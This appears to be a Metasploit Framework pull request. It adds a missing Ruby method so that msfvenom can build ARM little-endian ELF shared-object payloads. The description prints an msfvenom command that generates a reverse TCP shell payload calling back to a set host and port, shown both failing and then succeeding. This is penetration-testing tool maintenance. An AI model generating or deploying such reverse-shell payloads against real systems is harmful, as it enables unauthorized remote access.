### PR TITLE
undefined method `to_linux_armle_elf_dll' for Msf::Util::EXE:Class

### DIFF
--- a/lib/msf/util/exe.rb
+++ b/lib/msf/util/exe.rb
@@ -1136,6 +1136,17 @@ require 'msf/core/exe/segment_appender'
     to_exe_elf(framework, opts, "template_armle_linux.bin", code)
   end
 
+  # self.to_linux_armle_elf_dll
+  #
+  # @param framework [Msf::Framework]
+  # @param code       [String]
+  # @param opts       [Hash]
+  # @option           [String] :template
+  # @return           [String] Returns an elf-so
+  def self.to_linux_armle_elf_dll(framework, code, opts = {})
+    to_exe_elf(framework, opts, "template_armle_linux_dll.bin", code)
+  end
+  
   # self.to_linux_aarch64_elf
   #
   # @param framework [Msf::Framework]


### PR DESCRIPTION
**Current**
```
msfvenom -p linux/armle/shell_reverse_tcp lport=1337 lhost=192.168.1.100 -f elf-so > shell.so
[-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload
[-] No arch selected, selecting arch: armle from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 172 bytes
Error: undefined method `to_linux_armle_elf_dll' for Msf::Util::EXE:Class
Did you mean?  to_linux_armle_elf
               to_linux_x64_elf_dll
               to_linux_x86_elf_dll
```

**Fixed**
```
msfvenom -p linux/armle/shell_reverse_tcp lport=1337 lhost=192.168.1.100 -f elf-so > shell.so
[-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload
[-] No arch selected, selecting arch: armle from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 172 bytes
Final size of elf-so file: 418 bytes

file shell.so
shell.so: ELF 32-bit LSB shared object ARM, version 1 (SYSV), dynamically linked, stripped
```